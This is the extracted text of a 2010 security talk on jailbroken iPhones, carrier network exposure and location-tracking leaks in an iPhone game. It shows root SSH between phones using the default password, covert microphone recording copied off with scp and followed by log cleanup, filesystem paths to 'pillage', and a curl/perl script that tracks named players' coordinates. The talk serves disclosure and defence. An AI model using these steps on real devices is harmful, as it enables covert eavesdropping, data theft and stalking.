Download - The New World of Smartphone Security
![Page 1: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/1.jpg)
The New World of Smartphone Security
What Your iPhone Disclosed About You
Trevor HawthornManaging Partner
Friday, July 9, 2010
![Page 2: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/2.jpg)
Today’s Talk
“Pockets full of shells”
Friday, July 9, 2010
![Page 3: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/3.jpg)
Today’s Talk
“I can see you from my house”
Friday, July 9, 2010
![Page 4: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/4.jpg)
Who I am now
Friday, July 9, 2010
![Page 5: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/5.jpg)
Old Smartphone Best Practices
= Bad
= Good
Friday, July 9, 2010
![Page 6: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/6.jpg)
New Smartphone Best Practices
1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.
2. Get iFart, it’s hilarious.
Friday, July 9, 2010
![Page 7: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/7.jpg)
If AT&T is in attendance:
Friday, July 9, 2010
![Page 8: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/8.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
Friday, July 9, 2010
![Page 9: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/9.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
Friday, July 9, 2010
![Page 10: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/10.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
Friday, July 9, 2010
![Page 11: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/11.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
Friday, July 9, 2010
![Page 12: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/12.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
Friday, July 9, 2010
![Page 13: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/13.jpg)
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
• Would love to chat
Friday, July 9, 2010
![Page 14: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/14.jpg)
Jailbreaking
blackra1n
pwnagetool
Friday, July 9, 2010
![Page 15: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/15.jpg)
It opens up a whole new world of applications
Friday, July 9, 2010
![Page 16: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/16.jpg)
It opens up a whole new world of applications
• common Unix binaries
Friday, July 9, 2010
![Page 17: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/17.jpg)
It opens up a whole new world of applications
• common Unix binaries
• sshd
Friday, July 9, 2010
![Page 18: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/18.jpg)
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
Friday, July 9, 2010
![Page 19: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/19.jpg)
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
Friday, July 9, 2010
![Page 20: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/20.jpg)
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
• super easy to JB your phone
Friday, July 9, 2010
![Page 21: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/21.jpg)
Impact on security
“Jail breaking removes 80% of the iPhone’s security precautions”
Charlie Miller, SyScan 2009
Friday, July 9, 2010
![Page 22: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/22.jpg)
How many iPhones are jailbroken?
Friday, July 9, 2010
![Page 23: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/23.jpg)
6.93%
[1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
Friday, July 9, 2010
![Page 24: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/24.jpg)
Global Stats
Friday, July 9, 2010
![Page 25: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/25.jpg)
ifconfig root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
ether 0a:0b:ad:0b:ab:e0
Friday, July 9, 2010
![Page 26: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/26.jpg)
Interfaces
Friday, July 9, 2010
![Page 27: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/27.jpg)
en0 = 802.11 interface
Interfaces
Friday, July 9, 2010
![Page 28: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/28.jpg)
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
Interfaces
Friday, July 9, 2010
![Page 29: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/29.jpg)
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
Interfaces
Friday, July 9, 2010
![Page 30: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/30.jpg)
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
Interfaces
Friday, July 9, 2010
![Page 31: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/31.jpg)
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
pdp_ip3 = used with tethering
Interfaces
Friday, July 9, 2010
![Page 32: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/32.jpg)
ifconfig
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
Friday, July 9, 2010
![Page 33: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/33.jpg)
sshd
Friday, July 9, 2010
![Page 34: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/34.jpg)
So what?
Friday, July 9, 2010
![Page 35: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/35.jpg)
Until (about) October 16, 2009 AT&T did not filter device to device IP network
traffic.
Friday, July 9, 2010
![Page 36: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/36.jpg)
AT&T’s Network
Most people think it looks like this:
/32
Friday, July 9, 2010
![Page 37: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/37.jpg)
AT&T’s Network
Actually, more like this:
Multiple /16’s
Friday, July 9, 2010
![Page 38: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/38.jpg)
Your smartphone (and laptop/blackberry, etc.) has been on one giant
flat network...
Friday, July 9, 2010
![Page 39: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/39.jpg)
So I started looking around...
Friday, July 9, 2010
![Page 40: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/40.jpg)
Friday, July 9, 2010
![Page 41: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/41.jpg)
Friday, July 9, 2010
![Page 42: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/42.jpg)
Devices On the Network
10,589* IPs scanned
Count Port What?
83244
3,644
22 sshd80 http
2008 PDANet62078 iPhone Default
Friday, July 9, 2010
![Page 43: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/43.jpg)
Other stuff out there
• Saw a Linux box with sshd
• Windows Mobile devices
• Blackberries
• Windows PC’s
• PDANet for the iPhone is an open proxy.
Friday, July 9, 2010
![Page 44: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/44.jpg)
Friday, July 9, 2010
![Page 45: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/45.jpg)
ssh access between phones
Trevors-iPhone:~ root# ssh [email protected]
Password: [alpine]
Nates-iPhone:~ root#
Nates-iPhone:~ root# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
Friday, July 9, 2010
![Page 46: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/46.jpg)
Filesystem Guide
Interesting stuff:
/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)/private/var/mobile/Library/SMS - SMS Text Messages/private/var/mobile/Library/Voicemail - Voicemail in .amr format/private/var/mobile/Library/AddressBook - Contacts/private/var/mobile/Library/CallHistory - Call History/private/var/mobile/Library/Notes - Notes
Friday, July 9, 2010
![Page 47: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/47.jpg)
/private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db
Friday, July 9, 2010
![Page 48: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/48.jpg)
Let’s do a bit more
Erica Utilities - cmd line utilities for the iPhone
recAudiorecAudio: Record audio from the onboard microphone.
findmeQueries the iPhone’s GPS API to return latitude/longitude
Friday, July 9, 2010
![Page 49: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/49.jpg)
Attacker Victim
recAudio
scp/ssh
recording.aiff
10.69.62.10010.69.62.220
Friday, July 9, 2010
![Page 50: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/50.jpg)
I can hear you typingTrevors-iPhone:~ root# scp bin/recAudio [email protected]:
Password:
recAudio 100% 19KB 1.3KB/s 00:00
Trevors-iPhone:~ root# ssh [email protected]
Password:
Nates-iPhone:~ root# ./recAudio
Start talking. Press ^C to finish.
Starting recording
^C
Interrupted.
Stopping recording
Friday, July 9, 2010
![Page 51: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/51.jpg)
Nates-iPhone:~ root# ls -l *.aiff
-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff
Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff
Trevors-iPhone: root# scp [email protected]:~/*.aiff .
Password:
test.aiff 100% 523KB 2.2KB/s 00:00
Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
Nates-iPhone:~ root# last
wtmp begins at Fri Oct 2 22:41
Nates-iPhone:~ root#
Friday, July 9, 2010
![Page 52: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/52.jpg)
Other bad things
Friday, July 9, 2010
![Page 53: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/53.jpg)
Other bad things
• ./openURL tel://1-900-XXX-XXX
Friday, July 9, 2010
![Page 54: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/54.jpg)
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
Friday, July 9, 2010
![Page 55: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/55.jpg)
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
Friday, July 9, 2010
![Page 56: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/56.jpg)
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
Friday, July 9, 2010
![Page 57: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/57.jpg)
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
• go wild on whatever network en0 is connected to.
Friday, July 9, 2010
![Page 58: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/58.jpg)
Worms and Exploits
Friday, July 9, 2010
![Page 59: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/59.jpg)
Dutch Extortion
November 2009
Friday, July 9, 2010
![Page 60: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/60.jpg)
ikee Worm
November 2009
Friday, July 9, 2010
![Page 61: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/61.jpg)
Exploits
• Phone/Privacy.A* command line tool
• Phone/iBotNet.A* worm with C&C*Discovered by security firm Intego
Friday, July 9, 2010
![Page 62: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/62.jpg)
Some good news
Friday, July 9, 2010
![Page 63: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/63.jpg)
Some good news• AT&T does segment part of their network:
Friday, July 9, 2010
![Page 64: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/64.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
Friday, July 9, 2010
![Page 65: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/65.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
Friday, July 9, 2010
![Page 66: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/66.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
Friday, July 9, 2010
![Page 67: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/67.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
Friday, July 9, 2010
![Page 68: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/68.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
Friday, July 9, 2010
![Page 69: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/69.jpg)
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
• Man this is slow...
Friday, July 9, 2010
![Page 70: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/70.jpg)
email to ID user
<img src=”http://10.69.62.220/i.jpg”>
10.69.63.220:80 10.69.63.110
10.69.63.220:80 10.69.63.110src:10.69.63.110dst:10.69.63.220
Friday, July 9, 2010
![Page 71: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/71.jpg)
What to do
• Don’t Jailbreak your phone if you care about security (sorry)
• Change root and mobile users’ passwords
• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install
• IT Folks: Policy on jailbroken iphones
• AT&T: Filter mobile to mobile IP traffic
Friday, July 9, 2010
![Page 72: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/72.jpg)
Privacy and Location Based Apps
Friday, July 9, 2010
![Page 73: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/73.jpg)
Location Based Apps
Friday, July 9, 2010
![Page 74: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/74.jpg)
Location Based Apps
• Underworld: Sweet Deal
Friday, July 9, 2010
![Page 75: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/75.jpg)
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
Friday, July 9, 2010
![Page 76: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/76.jpg)
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
Friday, July 9, 2010
![Page 77: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/77.jpg)
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
• Phone sends high resolution coordinates to game server
Friday, July 9, 2010
![Page 78: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/78.jpg)
Like Druglords
Friday, July 9, 2010
![Page 79: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/79.jpg)
Underworld: Sweetdeal
Friday, July 9, 2010
![Page 80: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/80.jpg)
Google Maps
Friday, July 9, 2010
![Page 81: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/81.jpg)
Paros
• Client side proxy
• Configure iPhone to use machine running Paros’s IP address as proxy
• Watch what your apps send and receive
Friday, July 9, 2010
![Page 82: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/82.jpg)
Request
Friday, July 9, 2010
![Page 83: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/83.jpg)
Response
Friday, July 9, 2010
![Page 84: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/84.jpg)
Used to monitor players
Friday, July 9, 2010
![Page 85: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/85.jpg)
Friday, July 9, 2010
![Page 86: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/86.jpg)
Friday, July 9, 2010
![Page 87: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/87.jpg)
Friday, July 9, 2010
![Page 88: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/88.jpg)
Friday, July 9, 2010
![Page 89: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/89.jpg)
Friday, July 9, 2010
![Page 90: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/90.jpg)
Let’s pick a non-intel agency player
chezk
Friday, July 9, 2010
![Page 91: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/91.jpg)
Request
Friday, July 9, 2010
![Page 92: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/92.jpg)
Response
Friday, July 9, 2010
![Page 93: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/93.jpg)
Lat/Lon to GMaps:
Friday, July 9, 2010
![Page 94: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/94.jpg)
County Records
Friday, July 9, 2010
![Page 95: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/95.jpg)
Friday, July 9, 2010
![Page 96: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/96.jpg)
Ok neat, what else?
Friday, July 9, 2010
![Page 97: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/97.jpg)
Near real-time geolocation tracking of players
Friday, July 9, 2010
![Page 98: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/98.jpg)
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
Friday, July 9, 2010
![Page 99: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/99.jpg)
#/bin/sh## First login...#curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/## Then update locationcurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/## Get GMap obhjectscurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/
curl script
Friday, July 9, 2010
![Page 100: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/100.jpg)
perl script#! /usr/bin/perl
use strict;use warnings;
# make single or multiline input into one scalar my $glob = join('',(<>));
# extract name-to-flag records my @records = $glob =~ /(<name>.*?<\/lon>)/ig;
for (@records){ my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|i; print "$lat,$lon,$name\n";}
Friday, July 9, 2010
![Page 101: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/101.jpg)
perl script output
39.93220206723633,-77.47186584472656,poppyseed38.13753356933594,-77.06847380591797,Gadsden39.98429718017578,-78.30014190673828,Ziggety39.23520812988281,-77.40483581542969,Lexi39.855418395996094,-77.2717056274414,Tatu39.55705801582031,-77.4004086303711,Bigfoot36.67790985107422,-77.5902328491211,Jeneko38.297552490234375,-77.65829467773438,Stilbored39.891050720214844,-77.55879211025781,Timoteo39.66313247680664,-78.04374694824219,Gamber36.295310314697266,-78.14061126700984,UnderWear
Friday, July 9, 2010
![Page 102: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/102.jpg)
Friday, July 9, 2010
![Page 103: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/103.jpg)
Friday, July 9, 2010
